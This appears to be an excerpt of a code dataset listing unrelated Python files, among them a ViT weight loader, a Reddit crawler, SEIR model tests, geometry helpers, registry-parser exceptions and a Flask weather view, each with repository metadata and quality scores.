'vit_large_patch16_224': 'https://storage.googleapis.com/vit_models/imagenet21k/ViT-L_16.npz',
'vit_large_patch32_224': 'https://storage.googleapis.com/vit_models/imagenet21k/ViT-L_32.npz',
# Hybrid (resnet50 + ViT)
'r50_vit_base_patch16_224': 'https://storage.googleapis.com/vit_models/imagenet21k/R50+ViT-B_16.npz',
'r50_vit_large_patch32_224': 'https://storage.googleapis.com/vit_models/imagenet21k/R50+ViT-L_32.npz',
}
def load_from_zoo(model, model_name, pretrained_path='pretrained/official'):
model_name = change_384_224(model_name)
Path(os.path.join(pretrained_path, model_name)).mkdir(parents=True, exist_ok=True)
if model_urls[model_name].endswith('pth'):
state_dict = load_state_dict_from_url(url=model_urls[model_name],
model_dir=os.path.join(pretrained_path, model_name),
progress=True, map_location='cpu')
state_dict.pop('fc.weight', None)
state_dict.pop('fc.bias', None)
state_dict.pop('classifier.weight', None)
state_dict.pop('classifier.bias', None)
model.load_state_dict(state_dict, strict=False)
elif model_urls[model_name].endswith('npz'):
npz = load_npz_from_url(url=model_urls[model_name],
file_name=os.path.join(pretrained_path, model_name, os.path.basename(model_urls[model_name])))
model.load_npz(npz)
def change_384_224(model_name):
model_name = model_name.replace('384', '224')
return model_name
def load_npz_from_url(url, file_name):
if not Path(file_name).exists():
subprocess.run(["wget", "-r", "-nc", '-O', file_name, url])
return np.load(file_name)
| 2.21875 | 2 |
crawler1.py | pjha1994/Scrape_reddit | 0 | 6992 | import requests
from bs4 import BeautifulSoup
def recursiveUrl(url, link, depth):
if depth == 5:
return url
else:
print(link['href'])
page = requests.get(url + link['href'])
soup = BeautifulSoup(page.text, 'html.parser')
newlink = soup.find('a')
if len(newlink) == 0:
return link
else:
return link, recursiveUrl(url, newlink, depth + 1)
def getLinks(url):
page = requests.get(url)
soup = BeautifulSoup(page.text, 'html.parser')
links = soup.find_all('a')
for link in links:
links.append(recursiveUrl(url, link, 0))
return links
links = getLinks("http://www.reddit.com/")
print(links) | 3.1875 | 3 |
chime2/tests/normal/models/seir_test.py | BrianThomasRoss/CHIME-2 | 0 | 6993 | """Tests for SEIR model in this repo
* Compares conserved quantities
* Compares model against SEIR wo social policies in limit to SIR
"""
from pandas import Series
from pandas.testing import assert_frame_equal, assert_series_equal
from bayes_chime.normal.models import SEIRModel, SIRModel
from pytest import fixture
from tests.normal.models.sir_test import ( # pylint: disable=W0611
fixture_penn_chime_raw_df_no_policy,
fixture_penn_chime_setup,
fixture_sir_data_wo_policy,
)
COLS_TO_COMPARE = [
"susceptible",
"infected",
"recovered",
# Does not compare census as this repo uses the exponential distribution
]
PENN_CHIME_COMMIT = "<PASSWORD>"
@fixture(name="seir_data")
def fixture_seir_data(sir_data_wo_policy):
"""Returns data for the SIHR model
"""
x, p = sir_data_wo_policy
pp = p.copy()
xx = x.copy()
pp["alpha"] = 0.5
pp["nu"] = 1
pp["initial_exposed"] = 0
return xx, pp
def test_conserved_n(seir_data):
"""Checks if S + E + I + R is conserved for SEIR
"""
x, pars = seir_data
n_total = 0
for key in SEIRModel.compartments:
n_total += pars[f"initial_{key}"]
seir_model = SEIRModel()
predictions = seir_model.propagate_uncertainties(x, pars)
n_computed = predictions[SEIRModel.compartments].sum(axis=1)
n_expected = Series(data=[n_total] * len(n_computed), index=n_computed.index)
assert_series_equal(n_expected, n_computed)
def test_compare_sir_vs_seir(sir_data_wo_policy, seir_data, monkeypatch):
"""Checks if SEIR and SIR return same results if the code enforces
* alpha = gamma
* E = 0
* dI = dE
"""
x_sir, pars_sir = sir_data_wo_policy
x_seir, pars_seir = seir_data
pars_seir["alpha"] = pars_sir["gamma"] # will be done by hand
def mocked_seir_step(data, **pars):
data["exposed"] = 0
new_data = SEIRModel.simulation_step(data, **pars)
new_data["infected"] += new_data["exposed_new"]
return new_data
seir_model = SEIRModel()
monkeypatch.setattr(seir_model, "simulation_step", mocked_seir_step)
sir_model = SIRModel()
predictions_sir = sir_model.propagate_uncertainties(x_sir, pars_sir)
predictions_seir = seir_model.propagate_uncertainties(x_seir, pars_seir)
assert_frame_equal(
predictions_sir[COLS_TO_COMPARE], predictions_seir[COLS_TO_COMPARE],
)
| 2.203125 | 2 |
Libraries/mattsLibraries/mathOperations.py | mrware91/PhilTransA-TRXS-Limits | 0 | 6994 | import numpy as np
from scipy.interpolate import interp1d
from pyTools import *
################################################################################
#~~~~~~~~~Log ops
################################################################################
def logPolyVal(p,x):
ord = p.order()
logs = []
for idx in xrange(ord+1):
logs.append( np.log( p[idx] ) + (ord-idx)*np.log(x) )
return logs
################################################################################
#~~~~~~~~~Symmeterize data
################################################################################
def symmeterize( x, y, interp_type='cubic' ):
if x.min() <= 0:
raise ValueError('x.min() must be greater than zero.')
xs = np.array([-x,x]).flatten()
xs.sort()
f = interp1d( x , y , kind=interp_type )
return { 'x':xs , 'y':f(np.abs(xs)) }
################################################################################
#~~~~~~~~~3D Shapes
################################################################################
def makeSphere(x0=0,y0=0,z0=0,r=1,ntheta=30,nphi=30):
u = np.linspace(0, np.pi, ntheta)
v = np.linspace(0, 2 * np.pi, nphi)
x = np.outer(np.sin(u), np.sin(v))*r
y = np.outer(np.sin(u), np.cos(v))*r
z = np.outer(np.cos(u), np.ones_like(v))*r
return x+x0, y+y0, z+z0
def makeCylinder(x0=0,y0=0,z0=0,r=1,h=10,ntheta=30,nz=30):
u = np.linspace(0, 2*np.pi, ntheta)
z = np.linspace(0, h, nz)
UU,ZZ = np.meshgrid(u,z)
XX = np.cos(UU)*r
YY = np.sin(UU)*r
# ax.plot_wireframe(x, y, z)
return XX+x0, YY+y0, ZZ+z0
def generateLine3D( x0=0, x1=1, y0=0, y1=1, z0=0, z1=0, N=2 ):
return {'line':{'xData':np.linspace(x0,x1,N),
'yData':np.linspace(y0,y1,N),
'zData':np.linspace(z0,z1,N),
'cData':np.ones((N,1))}}
################################################################################
#~~~~~~~~~2D Shapes
################################################################################
def generateCircle(R=1, X0=0, Y0=0, N = 60, thetaMin = 0, thetaMax = 2*np.pi ):
thetas = np.linspace( thetaMin , thetaMax , N)
uY = np.sin( thetas )*R
uX = np.cos( thetas )*R
return {'circle':{'xData':uX+X0, 'yData':uY+Y0}}
def generateEllipse( RX=2, RY=1, X0=0, Y0=0, N = 60, thetaMin = 0, thetaMax = 2*np.pi ):
thetas = np.linspace( thetaMin , thetaMax , N)
uY = np.sin( thetas )*RY
uX = np.cos( thetas )*RX
return {'ellipse':{'xData':uX+X0, 'yData':uY+Y0}}
def makeCylinder2D( L = 10., R = 1., N=60, view_degrees=30. ):
yFac = np.cos(view_degrees * np.pi/180.)
zFac = np.sin(view_degrees * np.pi/180.)
xL = np.ones((2,1))*-R
xR = -xL
y = np.array([0,L])*yFac
cylinder = { 'leftSide':{'xData':xL, 'yData':y},
'rightSide':{'xData':xR, 'yData':y},
'upperEllipse':generateEllipse(RX = R, RY=R*zFac, Y0=L*yFac,N=N)['ellipse'],
'lowerHalfEllipse':generateEllipse(RX = R, RY=R*zFac, thetaMin=np.pi, thetaMax=2*np.pi, N=int(N/2.))['ellipse']}
return cylinder
################################################################################
#~~~~~~~~~Rotations
################################################################################
def rotateObject(x,y,z,ax=None,ay=None,az=None):
if ax is not None:
y,z = rotateAt(y,z,ax)
if ay is not None:
x,z = rotateAt(x,z,-ay)
if az is not None:
x,y = rotateAt(x,y,az)
return x,y,z
def rotateAt(x,y,a):
xp = np.cos(a)*x-np.sin(a)*y
yp = np.cos(a)*y+np.sin(a)*x
return xp, yp
def rotateObj2D( obj_in, degrees ):
obj = obj_in.copy()
keys = obj.keys()
for key in keys:
obj[key] = rotate2D( degrees=degrees, **obj[key] )
return obj
def rotate2D( xData, yData, degrees ):
x = xData.flatten()
y = yData.flatten()
z = np.zeros_like(x)
x,y,z = rotateObject( x, y, z, az=float(degrees)/180.*np.pi )
return {'xData':x, 'yData':y}
def rotateObj3D( obj_in, gamma, theta, phi ):
obj = obj_in.copy()
keys = obj.keys()
for key in keys:
obj[key] = rotate3D( gamma=gamma, theta=theta, phi=phi, **obj[key] )
return obj
def rotate3D( xData, yData, zData, gamma, theta, phi, kwargs_toggle=True, **kwargs ):
ignore_kwargs(kwargs, toggle=kwargs_toggle)
x = xData.flatten()
y = yData.flatten()
z = zData.flatten()
x,y,z = rotateObject( x, y, z, az=float(gamma)/180.*np.pi )
x,y,z = rotateObject( x, y, z, ay=float(theta)/180.*np.pi )
x,y,z = rotateObject( x, y, z, az=float(phi)/180.*np.pi )
return {'xData':x, 'yData':y, 'zData':z}
| 2.515625 | 3 |
setup.py | avryhof/ambient_api | 20 | 6995 | from setuptools import setup
setup(
name="ambient_api",
version="1.5.6",
packages=["ambient_api"],
url="https://github.com/avryhof/ambient_api",
license="MIT",
author="<NAME>",
author_email="<EMAIL>",
description="A Python class for accessing the Ambient Weather API.",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
],
install_requires=["requests", "urllib3"],
)
| 1.390625 | 1 |
tests/llvm/static/test_main_is_found/test_main_is_found.py | ganeshutah/FPChecker | 19 | 6996 | <reponame>ganeshutah/FPChecker
#!/usr/bin/env python
import subprocess
import os
def setup_module(module):
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
os.chdir(THIS_DIR)
def teardown_module(module):
cmd = ["make clean"]
cmdOutput = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
def test_1():
cmd = ["make"]
cmdOutput = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
passed = False
for l in cmdOutput.decode('utf-8').split("\n"):
if "#FPCHECKER: main() found" in l:
passed = True
assert passed == True
| 2.609375 | 3 |
regipy/exceptions.py | kamnon/regipy | 190 | 6997 | class RegipyException(Exception):
"""
This is the parent exception for all regipy exceptions
"""
pass
class RegipyGeneralException(RegipyException):
"""
General exception
"""
pass
class RegistryValueNotFoundException(RegipyException):
pass
class NoRegistrySubkeysException(RegipyException):
pass
class NoRegistryValuesException(RegipyException):
pass
class RegistryKeyNotFoundException(RegipyException):
pass
class UnidentifiedHiveException(RegipyException):
pass
class RegistryRecoveryException(RegipyException):
pass
class RegistryParsingException(RegipyException):
"""
Raised when there is a parsing error, most probably a corrupted hive
"""
pass
class NtSidDecodingException(RegipyException):
"""
Raised when the binary Windows NT SID representation can not be decoded
"""
| 2.140625 | 2 |
Dynamic_Programming/1259.Integer Replacement/Solution_BFS.py | Zhenye-Na/LxxxCode | 12 | 6998 | from collections import deque
class Solution:
"""
@param n: a positive integer
@return: the minimum number of replacements
"""
def integerReplacement(self, n):
# Write your code here
steps = 0
if n == 1:
return steps
queue = deque([n])
while queue:
size = len(queue)
print(queue, steps)
for _ in range(size):
num = queue.popleft()
if num == 1:
return steps
if num % 2 == 0:
queue.append(num // 2)
else:
queue.append(num + 1)
queue.append(num - 1)
steps += 1
return 0
| 3.8125 | 4 |
src/routes/web.py | enflo/weather-flask | 0 | 6999 | <gh_stars>0
from flask import Blueprint, render_template
from gateways.models import getWeatherData
web = Blueprint("web", __name__, template_folder='templates')
@web.route("/", methods=['GET'])
def home():
items = getWeatherData.get_last_item()
cityName = items["city"]
return render_template("index.html",
city=cityName[0],
temperature=items["temperature"],
humidity=items["humidity"],
pressure=items["pressure"])
#@web.route("/profile", methods=['GET'])
#def profile():
# items = getWeatherData.get_last_item()
# return render_template("profile.html",
# celcius=items["temperature"],
# humidity=items["humidity"],
# pressure=items["pressure"])
#@web.route("/about", methods=['GET'])
#def about():
# return render_template("about.html")
| 2.484375 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.